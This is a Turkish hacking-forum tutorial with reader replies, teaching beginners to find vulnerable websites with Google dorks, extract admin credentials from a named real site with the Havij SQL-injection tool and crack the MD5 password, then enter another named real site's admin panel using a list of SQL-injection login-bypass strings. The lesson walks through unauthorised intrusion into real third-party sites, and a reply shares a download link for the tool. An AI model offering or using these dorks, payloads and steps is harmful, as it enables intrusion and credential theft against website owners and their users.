1. Düzey Hack Dersleri #6-sql Dork - Sql Bypass - Havij Kullanımı

Selâmün Aleyküm devrelerim. Hack Derslerinde kaldığımız yerden devam edeceğiz. Önceki dersimizde büyük bir web güvenlik açığı olan SQL Açığı'nı kullanmayı
sizlere gösterdim.

1. Düzey Hack Dersleri #1-Başlangıç
1. Düzey Hack Dersleri #2-Temel Hack Terimleri
1. Düzey Hack Dersleri #3-Brute Force ve İlgili Hack Terimleri
1. Düzey Hack Dersleri #4-Rte ve Upload Açıklarını Kullanarak Site Hackleme
1. Düzey Hack Dersleri #5-SQL Açığı Kullanımı

Bu dersimizde ise SQL Açığı ile ilgili 3 önemli şey daha öğrenip SQL Açığını bitireceğiz. Devam edelim...

1- Sql Dorklar Yazma

Önceki dersimizde Sql Açığını kullanmayı öğretirken kullandığım siteyi internette bulduğum "Sql Açıklı Siteler" ile ilgili konuların birinden aldım. Yalnız bu hazır siteler
bir süre sonra işimize yaramamaya başlıyor çünkü çoğu kaynakta birkaç tanesi dışında aynı siteler var. Bu yüzden kendi sitemizi kendimiz bulmayı öğrenmeliyiz.

1- Kullanmamız gereken kalıp sözcüğümüzü yazıyoruz:

Kod:

inurl:

2- Önceki konularda öğrendiğimiz Wordpress dorklarında yaptığımız gibi kalıp kelimenin yanına istediğimiz bir kelime yazmamız gerekiyor. Karşımıza o kelimenin içinde bulunduğu siteler gözükecek. "Google Çeviri" kullanarak istediğiniz dile çeviri yapabilirsiniz. Basit bir kelime kullanacağım: "makale" : İngilizce olarak: "article" Çok sık kullanılan dorklardandır.

Kod:

inurl:article

3- Kelimemizin yanına ".asp?" veya ".aspx" ya da ".php?" yazmamız gerekiyor. (.Asp, (.Aspx) ve .Php sunucu dilleridir. Detaylı bilgi için forumumuzda konular mevcut.) Ben Php seçeceğim.

Kod:

inurl:article.php?

4- Son olarak ikinci kalıp sözcüğümüzü (id=) dorkumuza ekliyoruz.

Kod:

inurl:article.php?id=

Basit bir dork oluşturmuş olduk ama dorkumuzu geliştirebiliriz.

4- Eğer dorkumuzu arattığımızda sadece belli bir ülkeye ait sonuçların çıkmasını istiyorsak "site:" kalıbı yanına ülke uzantısını ekleyebiliriz. Ülke uzantılarını internette bulabilirsiniz.
Örnek olması açısından ".uk" İngiltere'nin site uzantısıdır. Aşağıdaki kodu yazdığımızda sadece İngiltere'ye ait "makale" sözcüğü içeren siteleri aratmış olacağız.

Kod:

inurl:article.php?id= site:.uk

5- Bir de özel saldırılar yapmak için ekleme yapabiliriz. Sizin de bildiğiniz gibi web sitelerin sonunda ".com" , ".org" , ".gov" gibi uzantılar vardır. Bunların anlamlarını da internette bulabilirsiniz, örnek olarak; ".org" ticari kâr amacı taşımadan hizmet veren organizasyon sitelerince kullanılmaktadır.

Kod:

inurl:article.php?id= .org

6- İstersek aynı anda hem özel saldırı hem de ülke saldırısında bulabiliriz. İstediğimiz ülke uzantısını ekleyelim:

Kod:

inurl:article.php?id= .org.uk

Gelişmiş bir SQL dork yazmış olduk böylece. Yalnız şuna dikkat edin, şimdi bu dorku Google ya da Yandex vs. arattığımızda çıkan siteler SQL Açıklı olmuyor. "SQL Açığı Olma Olasılığı"'na sahip oluyor. Artık tek yapmanız gereken karşınıza çıkan sitelere girip site sonlarına tırnak işareti ( ' ) bırakmak olacaktır. Eğer hata alırsanız sitede SQL Açığı vardır.

2- Havij Programı Kullanımı

Havij programı bir SQL Enjeksiyon yani SQL Açıklı bir sitedeki veriyi otomatik olarak hızlı bir şekilde çekmeye yarayan programdır. Program sizin şimdiki bilginize göre biraz daha iyi sonuç alabiliyor. Ayrıca içerisinde "Admin Panel Bulucu" , "Md5 Kırıcı" araçlar da barındıran güzel bir yazılımdır. Programın arayüzü gayet basit olmakla beraber profesyoneller için gelişmiş ayarları da barındırıyor. Program Arayüzü:



Önceki derste uygulama yaptığımız siteyi kullanacağız yine. Böylece yaptığımız işlemlerin doğruluğunu kanıtlarız.
Site: http://musculoskeletalsociety.in/
Sql Açığı Bulunan Sayfa: http://musculoskeletalsociety.in/page.php?id=5

İlk önce "Target" bölümüne Sql Açığı tespit ettiğimiz sayfanın linkini yazıp hemen yanındaki "Analyze" butonuna basıyoruz. Program alt taraftaki bölümde işlemleri tek tek yapacaktır.



Eğer işlem başarılı olursa ki bu sitede başarılı oldu zaten; sağ taraftaki "Tables" bölümüne giriyoruz. Sonra karşımıza görünen veritabanını (culosmus_muscul) seçip "Get Tables" butonuna tıklıyoruz. Karşımıza seçenekler açılıyor.



Yönetici bilgileri "user" , "administrator" , "admin" gibi seçeneklerden çıkar. Ben zaten "admin" seçeneğini bulduğuma göre seçeneği işaretleyip "Get Columns" düğmesine basabilirim.



Burada "user_id" ve "password" seçenekleri "Ben Buradayım!" der gibi sırıttığına göre ( ) kullanıcı adını ve parolayı "Get Data" butonuna basarak ele geçiriyorum.



Demek ki önceki derste yaptığımız işlemler doğruymuş. Kullanıcı adını ve parolayı ele geçirdikten sonra sağdan "Find Admin" seçeneğine tıklayıp "start" düğmesine basarak da admin panelini bir güzel buluyorum.



Karşınıza bu resimdeki gibi birden fazla seçenek sunabilir. Bazıları hatalıdır, bazı panellerde kullanıcı adı ve şifre uyuşmaz. Böylece doğru paneli bulursunuz.

Son olarak "MD5" seçeneğine karşımıza çıkan şifreyi girelim. Program bazı md5 kırıcı sitelere otomatik veri gönderip eğer şifre bulunursa karşımıza çıkaracaktır.



Bu arada Md5 şifremizi bulduk. Ama sakın ümitlenmeyin, ben aldım bile.

3- Bypass İle Site Hackleme

Bu da SQL Açığı'nın bir türüdür. Merak etmeyin, zor bir şey değil. Öncelikle "Bypass" kelimesinin ne anlama geldiğini tekrar hatırlayalım.

_______________________________________________________________________________________

Bypass:

Gerçek anlamı alternatif yoldan geçerek asıl yolu atlatmaktır. Hack alanındaki kullanımı ise belirli karakterler yardımıyla gidilecek yolu geçiştirmektir.
Örnek olarak bir admin paneli Bypass yöntemi ile atlatılabilir.

_______________________________________________________________________________________

Buna göre ilk yapmamız gereken bol bol admin paneli araştırmak. Bunun için admin panel dorklarını kullanabilir veya kendi dorklarınızı yazabilirsiniz.

Kod:

inurl:adminlogin.aspx
inurl:adminlogin.asp
inurl:adminlogin.php
inurl:/admin/login.aspx
inurl:/admin/login.asp
inurl:/admin/login.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.aspx
inurl:admin/index.asp
inurl:admin/index.php

Admin Panel Dorklarını nasıl yazacağınızı anlatma gereği duymuyorum artık. Örneklere göre anlarsınız zaten. Sadece Admin Panel Listelerini araştırın biraz. Buna göre farklı dorklar da üretebilirsiniz.

Daha sonra girdiğiniz admin panellerinde aşağıdaki Bypass kodlarını tek tek deneyin.

Kod:

'=' 'or'
1’or’1’=’1
‘ or 1=1 –
1’or’1’=’1
admin’–
admin'--
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (‘a’=’a
hi”) or (“a”=”)
anything' OR 'x'='x

Bu Bypass Komutlarından en sık bulunanı ilkidir: '=' 'or'

Yapmanız gereken tek şey admin panelindeki kullanıcı adına da parola kısmına da Bypass Komutlarını yazmak. (İki bölüme de aynı Bypass Komutu gelmelidir.)
Eğer işe yararsa herhangi bir kullanıcı adı ve parola kullanmadan admin sayfasına geçiş yapacaksınız. Bir örnek verelim:

Site: http://www.i2t2.com/
Admin Panel: http://www.i2t2.com/admin/login.php

Username: '=' 'or'
Password: '=' 'or'

Gördüğünüz gibi sitenin paneline girebiliyoruz.

Bu dersimizin de sonuna geldik devreler. Özellikle takip edenler için kendimi zorlayıp konuları hızlıca devam ettirmeye çalışıyorum. Beğenilerinizi ve güzel yorumlarınızı bekliyorum. Herkese iyi çalışmalar, iyi forumlar...

 

Eline sağlık devrem.

 

Eyvallah devrem.

 

Sağolun devrelerim.

 

Eline koluna sağlık devrem Devamını Dört gözle bekliyoruz Ama kendini de fazla zorlamana gerek yok ne zaman istersen o zaman at Kolay gelsin..

 

devrem sqlmap kullanımınıda anlatın hata ileri düzey kullanımını benim videom var istiosanız atıyım ondan bakarak felan gösterin bu arada elinize sağlık

 

Sağol devrem.

Sağol devrem, SQL Map kullanmayı biliyorum ve onun için ileride konu açacağım. İstersen paylaş videonu, merak edenler izler.

 

Eline sağlık devrem.

Bence kendi konunu aç devrem, bazı kişiler yorumlara bakmıyorlar. Senin konuna bakar ve bilgilenirler yanlış anlama yani.

 

Event does not exist '', buda sql açığı olan sitelerin verdiği hatalardan birimidir devrem ?

 

devrelerim bu video sesim kötü ve tam anlatamdım heralde siz onlara bakmayın heyecandan siz ne anladaığınıza bakın devrelerim

 

Ne yaptın da geldi bu hata? SQL Hatasına benzemiyor.

 

devrem ama havij veya sqlmap ile incelemekte fayda var

 

ama devrem çevirdiğimizde olay mevcut deil dioe yani sql açığı yok

 

Devrem kullandığın siteyi havije yazıyorum finding database diyor ama tables da hiç bir şey yok ?

 

Havij Sürümü ne? 1.17 mi?

 

evet devrem

 

Tahmin etmiştim zaten.

Bunu indir devrem:
https://mega.nz/#!3kRQUDDZ!vcnIUhr1Rn0hJlNXNw53V03G4sA4EqgvuWxNRTFetHQ

VT: https://www.virustotal.com/tr/file/...df3ac71b25e165dba2e653da556e7913d8d/analysis/

 

Cannot open file C:\Windows\system32\comdlg32.ocx

 

Bu hatanın sebebi nedir ?

 

Gayret ve özverinize hayranım, teşekkürler..